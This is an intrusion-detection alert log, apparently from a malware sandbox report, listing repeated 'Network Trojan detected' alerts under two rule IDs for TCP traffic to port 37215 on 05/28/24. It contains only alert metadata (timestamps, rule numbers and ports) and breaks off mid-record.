            Timestamp:05/28/24-09:56:54.691732
            SID:2829579
            Source Port:42170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.735647
            SID:2835222
            Source Port:48646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058234
            SID:2829579
            Source Port:45382
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.764753
            SID:2835222
            Source Port:54446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.289759
            SID:2835222
            Source Port:59786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.965771
            SID:2835222
            Source Port:35574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.941672
            SID:2829579
            Source Port:52260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.811487
            SID:2835222
            Source Port:56254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.084384
            SID:2835222
            Source Port:60732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.511428
            SID:2835222
            Source Port:45820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.957089
            SID:2829579
            Source Port:42820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.806174
            SID:2835222
            Source Port:35580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857268
            SID:2835222
            Source Port:60384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.574215
            SID:2829579
            Source Port:39662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.830554
            SID:2835222
            Source Port:50826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863704
            SID:2835222
            Source Port:47364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052765
            SID:2835222
            Source Port:34228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.058869
            SID:2835222
            Source Port:37432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.425880
            SID:2835222
            Source Port:54548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.375254
            SID:2829579
            Source Port:36724
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.741882
            SID:2835222
            Source Port:47842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811913
            SID:2829579
            Source Port:58266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280211
            SID:2835222
            Source Port:36240
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.845050
            SID:2829579
            Source Port:55112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.827572
            SID:2829579
            Source Port:41448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.836535
            SID:2829579
            Source Port:54988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777123
            SID:2829579
            Source Port:44476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.996694
            SID:2835222
            Source Port:41230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.308157
            SID:2829579
            Source Port:33058
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.717946
            SID:2829579
            Source Port:60832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.062012
            SID:2829579
            Source Port:36964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.440223
            SID:2829579
            Source Port:54752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.074300
            SID:2829579
            Source Port:54918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919568
            SID:2835222
            Source Port:39952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.402051
            SID:2835222
            Source Port:45366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.326916
            SID:2829579
            Source Port:33074
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.540434
            SID:2835222
            Source Port:51392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.507207
            SID:2835222
            Source Port:44774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.793886
            SID:2835222
            Source Port:60254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996077
            SID:2829579
            Source Port:60572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290963
            SID:2835222
            Source Port:40526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.920340
            SID:2829579
            Source Port:46454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.784099
            SID:2835222
            Source Port:59418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.540392
            SID:2835222
            Source Port:45200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.586408
            SID:2835222
            Source Port:46948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.745800
            SID:2829579
            Source Port:37390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809925
            SID:2829579
            Source Port:53680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.077883
            SID:2835222
            Source Port:49384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.728417
            SID:2835222
            Source Port:52830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.772762
            SID:2835222
            Source Port:57994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.929802
            SID:2829579
            Source Port:58834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.065610
            SID:2835222
            Source Port:33140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261164
            SID:2835222
            Source Port:42014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.864926
            SID:2835222
            Source Port:49922
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.776988
            SID:2829579
            Source Port:48580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.966858
            SID:2829579
            Source Port:36098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.062708
            SID:2829579
            Source Port:45784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.227066
            SID:2829579
            Source Port:45836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.563908
            SID:2835222
            Source Port:36728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.741786
            SID:2835222
            Source Port:40076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.368401
            SID:2835222
            Source Port:54438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.376998
            SID:2829579
            Source Port:57154
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.922149
            SID:2829579
            Source Port:58480
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:46.566548
            SID:2835222
            Source Port:38232
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.440844
            SID:2835222
            Source Port:56754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639580
            SID:2835222
            Source Port:60366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.366873
            SID:2835222
            Source Port:44128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.818769
            SID:2835222
            Source Port:39332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.808354
            SID:2835222
            Source Port:44014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968227
            SID:2835222
            Source Port:33798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.952829
            SID:2835222
            Source Port:52688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039354
            SID:2829579
            Source Port:51256
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.071065
            SID:2835222
            Source Port:45248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.470655
            SID:2835222
            Source Port:51626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026789
            SID:2829579
            Source Port:37692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.552722
            SID:2835222
            Source Port:51120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:25.133868
            SID:2835222
            Source Port:45130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.555515
            SID:2829579
            Source Port:42232
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.925443
            SID:2829579
            Source Port:48988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.741520
            SID:2835222
            Source Port:40836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880549
            SID:2835222
            Source Port:44868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.857972
            SID:2835222
            Source Port:60386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.086692
            SID:2829579
            Source Port:53402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.054035
            SID:2835222
            Source Port:37172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.064005
            SID:2829579
            Source Port:55564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.317157
            SID:2835222
            Source Port:40192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.847192
            SID:2829579
            Source Port:42270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:36.425069
            SID:2829579
            Source Port:34556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.818287
            SID:2829579
            Source Port:37624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.957340
            SID:2835222
            Source Port:37638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.375914
            SID:2829579
            Source Port:34272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.470576
            SID:2835222
            Source Port:53326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046895
            SID:2835222
            Source Port:52706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.950997
            SID:2829579
            Source Port:42540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.795953
            SID:2835222
            Source Port:44698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.825395
            SID:2835222
            Source Port:47364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.556547
            SID:2829579
            Source Port:42856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.058995
            SID:2829579
            Source Port:42250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251335
            SID:2829579
            Source Port:56036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.406054
            SID:2835222
            Source Port:48726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.817083
            SID:2835222
            Source Port:42492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.549688
            SID:2835222
            Source Port:34794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.728076
            SID:2835222
            Source Port:56026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336083
            SID:2835222
            Source Port:45028
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.299951
            SID:2829579
            Source Port:37792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754597
            SID:2835222
            Source Port:48494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.636191
            SID:2835222
            Source Port:41864
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506825
            SID:2835222
            Source Port:53224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423054
            SID:2829579
            Source Port:60732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.327516
            SID:2829579
            Source Port:58944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.861151
            SID:2835222
            Source Port:32940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.936375
            SID:2829579
            Source Port:47616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.972262
            SID:2829579
            Source Port:56898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.938822
            SID:2835222
            Source Port:37832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.745173
            SID:2829579
            Source Port:35708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.510886
            SID:2835222
            Source Port:42906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.760136
            SID:2835222
            Source Port:60586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.760306
            SID:2835222
            Source Port:50298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.618434
            SID:2829579
            Source Port:56730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.831548
            SID:2829579
            Source Port:44884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777550
            SID:2829579
            Source Port:42894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.392840
            SID:2835222
            Source Port:58832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840368
            SID:2835222
            Source Port:41388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.932912
            SID:2829579
            Source Port:35590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.782866
            SID:2829579
            Source Port:54536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847014
            SID:2835222
            Source Port:43608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026469
            SID:2829579
            Source Port:50538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923632
            SID:2835222
            Source Port:39336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.374920
            SID:2835222
            Source Port:34602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.811550
            SID:2835222
            Source Port:39718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.771495
            SID:2829579
            Source Port:37128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855574
            SID:2835222
            Source Port:52428
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412990
            SID:2829579
            Source Port:43360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945306
            SID:2829579
            Source Port:58328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.926644
            SID:2835222
            Source Port:49026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.872314
            SID:2835222
            Source Port:52730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.303496
            SID:2835222
            Source Port:51910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.597005
            SID:2829579
            Source Port:35706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.027883
            SID:2835222
            Source Port:33830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061339
            SID:2829579
            Source Port:58302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.118694
            SID:2829579
            Source Port:55500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.945117
            SID:2835222
            Source Port:56986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.441889
            SID:2829579
            Source Port:41666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541538
            SID:2829579
            Source Port:53392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777848
            SID:2829579
            Source Port:56200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.741034
            SID:2829579
            Source Port:52250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.517637
            SID:2835222
            Source Port:57588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.760184
            SID:2835222
            Source Port:47862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045494
            SID:2829579
            Source Port:49474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.395873
            SID:2829579
            Source Port:59728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.611446
            SID:2835222
            Source Port:50308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927583
            SID:2829579
            Source Port:46170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336676
            SID:2829579
            Source Port:59148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.532596
            SID:2829579
            Source Port:60934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.926115
            SID:2829579
            Source Port:57030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.937468
            SID:2835222
            Source Port:42936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.303522
            SID:2835222
            Source Port:54674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862892
            SID:2829579
            Source Port:41426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810367
            SID:2835222
            Source Port:35562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.004964
            SID:2829579
            Source Port:44832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.584017
            SID:2829579
            Source Port:50622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.921756
            SID:2829579
            Source Port:37370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.300164
            SID:2835222
            Source Port:58410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.854711
            SID:2829579
            Source Port:51726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.939045
            SID:2835222
            Source Port:37380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605278
            SID:2835222
            Source Port:35328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:19.875340
            SID:2835222
            Source Port:38566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.084599
            SID:2835222
            Source Port:37630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.756657
            SID:2829579
            Source Port:41654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856470
            SID:2829579
            Source Port:48136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.746953
            SID:2829579
            Source Port:40594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067584
            SID:2829579
            Source Port:36540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.743475
            SID:2829579
            Source Port:36756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.470040
            SID:2829579
            Source Port:33404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.817160
            SID:2829579
            Source Port:51030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.815138
            SID:2835222
            Source Port:52342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.895694
            SID:2829579
            Source Port:51594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.290499
            SID:2835222
            Source Port:47908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.052247
            SID:2835222
            Source Port:46042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.912479
            SID:2835222
            Source Port:55138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.950254
            SID:2829579
            Source Port:34166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.877547
            SID:2829579
            Source Port:58324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.764748
            SID:2835222
            Source Port:40668
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309557
            SID:2829579
            Source Port:59198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.439892
            SID:2835222
            Source Port:52472
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261199
            SID:2829579
            Source Port:53830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251145
            SID:2835222
            Source Port:48582
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.990228
            SID:2829579
            Source Port:36820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777011
            SID:2835222
            Source Port:50032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.516623
            SID:2835222
            Source Port:53276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.560941
            SID:2829579
            Source Port:42340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.650738
            SID:2835222
            Source Port:59912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.473947
            SID:2835222
            Source Port:60134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811406
            SID:2829579
            Source Port:59104
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533698
            SID:2835222
            Source Port:40428
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.668909
            SID:2835222
            Source Port:58400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.065469
            SID:2835222
            Source Port:38690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.953448
